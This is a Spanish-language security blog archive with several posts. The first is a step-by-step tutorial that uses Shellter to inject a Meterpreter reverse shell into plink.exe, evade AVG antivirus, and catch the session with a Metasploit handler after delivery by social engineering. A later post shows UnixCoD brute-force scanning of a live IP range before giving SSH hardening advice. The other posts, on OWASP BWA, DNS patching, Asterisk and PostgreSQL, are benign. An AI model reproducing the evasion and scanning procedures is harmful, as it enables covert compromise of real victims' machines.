Archivo

Archive for the ‘Debian’ Category

Evadiendo Antivirus con Shellter y Metasploit

julio 21, 2015 11 comentarios

shellter

Las técnicas para evación de antivirus son muy diversas y cada vez evolucionan , sin embargo cada cierto tiempo aparecen nuevas técnicas unas mas buenas que otras.

Shellter, es una herramienta de inyección de shell dinámica, según sus autores, probablemente el primero infecta PE dinámico, se puede utilizar para inyectar shells en programas para  Windows basados en 32bits ( programas en 32bits) sin embargo esto no representa una limitante, ya que es muy usual tener Windows a 64bits y tener instalado programas a 32bits.

Shellter aprovecha la estructura original del PE en los archivos y no aplica ninguna modificación, añade una sección extra con RWE , además usa un enfoque dinámico único,  lo cual lo hace imperceptible por los antivirus.

Vamos a ver como es su uso:

1.- ESCENARIO

Kali Linux en la IP 192.168.1.36
Windows 7 con AVG Antivirus en la IP 192.168.1.35

hackingwindows

2.- SETUP
Es necesario descargar shellter desde la pagina https://www.shellterproject.com/download/  en esta caso usaremos la versión 4.0

wget http://www.silcom.com.pe/soft/shellter.zip   ( Sitio alternativo)
unzip shellter.zip
mv shellter /usr/share/

3.- INICIAR SHELLTER
– Vamos a usar el archivo “plink.exe” el cual se ubica en Kali Linux y moverlo a la carpeta donde tenemos shellter .

cp /usr/share/windows-binaries/plink.exe /usr/share/shellter/

shellter
– Luego iniciaremos shellter de la siguiente forma:

wineconsole shellter.exe

shellter

4.- CONFIGURACIÓN DE SHELLTER

– Escojer modo automatico con la opción “A”

shellter

– Luego indicaremos el programa al cual le inyectaremos el shell code el cual es el archivo plink.exe previamente copiado.

PE Targer : plink.exe

shellter

– Luego cuando aparezca la lista de payloads elegir la opción “L”
Use a listed payload or custom: L

shellter
– Luego elegir la opcion “1”
Select payload by index: 1

shellter

– Ahora configuraremos los datos de retorno del shell reverso

set LHOST : 192.168.1.36 ( IP de Kali Linux)
set LPORT : 5555 ( Puertos donde retornará la shell

shellter

– Finalmente si todo salio bien, tendremos un mensaje “Inyection Verified” y luego presionamos “Enter” y finalizaremos shellter.

shellter
Con esto hemos conseguido que el archivo plink.exe esté infectado con el shell reverso.

5.- ACTIVANDO EL HANDLER CON METASPLOIT

– Iniciamos con msfconsole

shellter

– Ahora pondremos a la escucha el handler en el puerto 5555

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.36
set lport 5555
exploit

shellter

6.- AHORA VAMOS AL WINDOWS Y PROBAMOS

– Mediante alguna técnica de ingeniería social ( y de esas hay muchas) conseguimos que el archivo “plink.exe”  sea ejecutado en la víctima.

shellter

– Como podemos ver tenemos una bonita sesión de meterpreter 😀 sin que el antivirus reaccione.

shellter
– Ahora podemos hacer un par de cosas

shellter

shellter

Bueno ya estamos adentro, la herramienta se ve prometedora.

UPTADE 03/2016
Para ejecutar shellter en Kali 2016.1 es necesario correr lo siguiente antes de wineconsole shellter.exe:

dpkg –add-architecture i386 && apt-get update && apt-get install wine32

Espero les sirva
Juan Oliva
@jroliva

Anuncios

OWASP Broken Web Applications Project

junio 16, 2015 Deja un comentario

owbaComo parte de la enseñanza de los cursos de Ethical Hacking que tengo la oportunidad de impartir, suelo hacer uso de aplicaciones o sistemas vulnerables, con el objetivo de poder recrear escenarios y que los participantes puedan no solo identificar fallos de seguridad, si no también poner en practica, diversas técnicas de explotación de vulnerabilidades y desarrollar un adecuado análisis de la razón por la cual se producen estos bugs.

OWASP Broken Web Applications Project  (OWASPBWA) sirve perfecto para este objetivo, ya que es un conjunto de aplicaciones web vulnerables que se distribuye en una máquina virtual que puede ser importada en VirtualBox por ejemplo.

OBWA es una maquina virtual que contiene instaladas aplicaciones web como WordPress, Jommla, phpBB2 entre otros proyectos como Webgoat, DVWA, Multidae, etc.

OWASPBWA

Lo más interesante desde el punto de vista académico, claro está 😀 es la gran cantidad de vulnerabilidades que podemos encontrar, basta con realizar un análisis con Nessus para darse cuenta de ello.

owaspbwa

owaspbwa

Dentro de las vulnerabilidades que se pueden explotar podemos citar algunas como :

WORDPRESS

CVE-2014-10021
WORDPRESS WP Symposium 14.11 shell upload
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-10021

CVE-2007-2426
high myGallery mygallerybrowser.php ‘myPath’
http://www.cvedetails.com/cve/CVE-2007-2426/

JOOMLA
CVE-2014-0793
Multiple cross-site scripting (XSS)
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0793

phpBB2
CVE-2003-1215, CVE-2003-1216
SQL injection vulnerability
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1215

Entre muchas otras vulnerabilidades que se pueden encontrar.

Mas información :

Página del proyecto
https://code.google.com/p/owaspbwa/

Archivo OVA para importar en VirtualBox
http://sourceforge.net/projects/owaspbwa/files/1.1.1/

User Guide
https://code.google.com/p/owaspbwa/wiki/UserGuide

Vídeo de la conferencia de presentación
https://www.youtube.com/watch?v=cwjcfAgKqcg

Espero les sirva
Saludos
Juan Oliva
@jroliva

 

 

 

 

 

 

 

Conferencias via IRC de ASTERISK-PERU

enero 19, 2009 1 comentario

El viernes pasado participe como ponente en una conferencia via Irc , organizada por la comuna de Asterisk-Peru , mi tema fue hablar un poco sobre las novedades de Astrisk 1.6 , la cual creo que salio muy simpatica , asi mismo estuvo Edgar Landivar de Elastix , hablando sobre el famoso modulo de callcenter , y finalmente Mark Warren , hablando sobre los equipos  redfone , Appliance de alta disponibilidad para Asterisk , todo lo que se converso en la conferencia lo pueden encontrar en estos enlaces.

Charla irc Asterisk 1.6 : http://www.asterisk-peru.com/node/1450

Carla irc Modulo de callcenter Elastix :  http://www.asterisk-peru.com/node/1449

Carla irc Redphone : http://www.asterisk-peru.com/node/1451

Categorías:Debian

Actualización critica en servidores DNS

agosto 15, 2008 Deja un comentario

Durante la quincena de julio se dio a conocer una grave vulnerabilidad del protocolo DNS (Cache poisoning) es decir evenenamiento de dns lo cual es sumamente grave, esto afecta a todas las plataformas y marcas, para los que usamos BIND, como saber si vulnerable ??,  aqui van los pasos :

Desde el servidor dns ejecutamos los siguiente:

#dig +short @127.0.0.1 porttest.dns-oarc.net TXT
porttest.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
“200.XX.XXX.222 is POOR: 26 queries in 2.7 seconds from 1 ports with std dev 0”

El resultado   ¨200.XX.XXX.222 is POOR¨ significa que la vercion de bind que tenemos es vulnerable, para actualizar esto seria lo siguiente

Para CENTOS :
#yum update bind

Para DEBIAN :
#apt-get update
#
apt-get install bind9

Para los dos casos hay que ejecutar el seguiente comando para verificar que todo este correcto en la conf y si no devuelve nada, quiere decir que estamos bien.

#named-checkconf

Despues de eso solo queda reinicar el servicio

#/etc/init.d/bind9 restart
ó
#service named restart

Ahora nuevamente comprobamos

#dig +short @127.0.0.1 porttest.dns-oarc.net TXT

porttest.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
“200.XX.XXX.222 is GREAT: 26 queries in 2.8 seconds from 26 ports with std dev 19533”

Nos regresa que 200.XX.XXX.222 is GREAT , quiere decir que ya no somos vulnerables. bueno si aun no lo hacen actualicen sus dns aunque lo usen solo de manera interna.

Fuente :
http://www.cert.org.mx/boletin/?vulne=5631
http://www.telmex.com.pe/seguridad/internet/diario/Importante+Y+Peligrosa+Vulnerabilidad+En+El+Protocolo+DNS.aspx
http://tuxjm.net/2008/07/29/como-verificar-si-nuestro-servidor-dns-bind9-es-vulnerable-al-dns-cache-poisoning/

Categorías:Centos, Debian, Linux

Telefóno IP Dlink DGP-202ESP y Asterisk

julio 1, 2008 2 comentarios

Hace tiempo que quería tener en mis manos este teléfono ip sobre todo por el soporte de IAX2 que trae y la posibilidad de usarlo como  anexo remoto.

Bueno la instalación no tiene mucho drama en realidad , tiene 2 interfaces una wan y otra lan , la interfase wan por defecto esta con dhcp así que solo basta engancharla a la red y verificar en el teléfono que ip tiene asignada atravez de la tecla Sysinfo en el panel. Después solo queda entrar a la interfase web , http://ip/ el acceso por defecto es admin , admin ,

Luego , como muestra la figura configurar los datos de nuestra extencion AIX , lo interesante de esto es que en el campo IAX SERVER es que no solo es posible ingresar una local o ip publica , si no también un dominio , esto es perfecto cuando  disponemos de una ip dinámica y tenemos un dominio publicado atravez de no-ip o dydns. y bueno funciona muy bien de esta forma.

La configuracion en nuestro iax.conf seria de esta forma.

[2001]
type=friend
context=default
secret=2001
host=dynamic
mailbox = 2001@default

Espero que le sirva.

Protegiendose contra UnixCoD Scanner ssh

mayo 16, 2008 2 comentarios

Últimamente he estado lidiando con servidores de algunas empresas que tenían el ssh dando la cara a internet (es decir abiertos), y algunos hasta hakeados , esto me imagino a la simplicidad con la que actualmente se puede implementar un servidor web o de correo en la actualidad , pero como siempre la seguridad es lo ultimo en que se piensa como en estos casos.

bueno debido a esto me tope con ese programa UnixCoD al parecer esta de moda debido su simplicidad y eficiencia a la hora hacer su trabajo , es un scanner que ataca al puerto 22 ssh mediante fuerza bruta ( diccionario de usuarios y contrasenas)  ¨ojo no es el unico¨ ,  así que si ven en su /var/log/auth.log muchos intentos extraños por ssh , no duden de que tarde o temprano van a poder entrar a su sistema.

Esta explicacion es con fines didacticos ya que hay que aprender a usar la herramienta para poder bloquearla:

descomprimir
tar zxvf unixcod.tar.gz
cd unixcod

scanear todo el rango (203.130.x.x)
./unix 203.130

de encontrar alguna maquina vulnerable, el hack estará en
cat vuln.txt

Como prevenir esto, bueno simple protegiendo el ssh y no dejarlo de manera estandar
# vi /etc/ssh/sshd_config

– cambiar el puerto por defecto ( por ejemplo este)
Port 22  por Port 475992

– Desabilitar logeo como root
PermitRootLogin no

– Banear entradas recurrentes , esto lo hacemos con fail2ban

# apt-get install fail2ban
# vi /etc/fail2ban/jail.local

Creacion de directica
[ssh]enabled = true
port = 475992
filter = sshd
logpath = /var/log/auth.log
maxretry = 3  # maximo 3 entradas erronas

Finalmente reiniciamos fail2ban y ssh

# /etc/init.d/fail2ban restart
# /etc/init.d/ssh restart
Con esto incrementaremos la seguridad en nuestro equipo aunque lo ideal seria pensar en acceder via vpn,  claves privadas o algun metodo parecido.

Howto Instalación Postgresql 8.3.0 sobre debian

marzo 6, 2008 5 comentarios

Hace tiempo que no posteaba nada por andar un poco atareado ( solo un poco jejee) , bueno ahora posteo la instalación de postgresql 8.3.0 sobre debian etch r1 , espero que le sirva a mas de uno.

1.- Instalando dependencias generales

Desde Apt

apt-get install make gcc g++ bzip2

instalando zlib

tar -xjf zlib-1.2.3.tar.bz2
./configure
make
make install

vi /etc/locale

es_PE ISO-8859-1
es_ES ISO-8859-1
( Para mi caso, puede cambiar de acuerdo al País )2.- Instalación de postgresql 8.3.0 desde fuentes sin modulo readline

tar -xjvf postgresql-8.3.0.tar.bz2
./configure –without-readline
make
make install

Si todo salien bien hasta aqui , entonces ya temos echo lo mas dificil, ahora solo queda configurar el entorno de las bases de datos y levantar el servidor.

3.- Configuracion del entorno

– Creando usuario postgres
adduser postgres

– Creando carpetas para las bases
mkdir /usr/local/pgsql/data

– Inicializando el servidor postgresl
chown postgres /usr/local/pgsql/data
su – postgres
/usr/local/pgsql/bin/initdb -E LATIN1 -D /usr/local/pgsql/data

(Esto es muy importante si quieren inicializar las bd con formato LATIN1 , que soporta caracteres especiales)

/usr/local/pgsql/bin/postmaster -D /usr/local/pgsql/data >logfile 2>&1 &

– Cargando el lenguaje plpsql en el template1
/usr/local/pgsql/bin/createlang plpgsql template1

– Creando base de datos test
/usr/local/pgsql/bin/createdb test
/usr/local/pgsql/bin/psql test

– Configurando acceso local o remoto

vi /usr/local/pgsql/data/pg_hba.conf

# “local” is for Unix domain socket connections only
local   all         all                               trust
# IPv4 local connections:
#host    all         all         127.0.0.1/32          trust
# IPv6 local connections:
#host    all         all         ::1/128               trust
host    all         all          240.171.180.0 255.255.255.0     password # acceso a alguna red publica
host    all         all          10.10.4.0 255.255.255.0     password # acceso a alguna dmz
host    all         all          192.168.1.0 255.255.255.0     password # acceso a la lan
host    all         all          0.0.0.0 0.0.0.0     password # esto solo si quieren dar acceso a cualquier red
vi /usr/local/pgsql/data/postgresql.conf

listen_addresses = ‘IPADDESS’ #colocar la ip local
port = 5432
TIPS

– Iniciando el servicio
/usr/local/pgsql/bin/pg_ctl -D /usr/local/pgsql/data -l logfile start

– Respaldo de base de datos , por ejemplo test
su – pgsql -c “pg_dump test > /usr/backups/testbd061206-1215.dump

– Restauración
/usr/local/pgsql/bin/psql -d test -f /usr/backups/testbd061206-1215.dump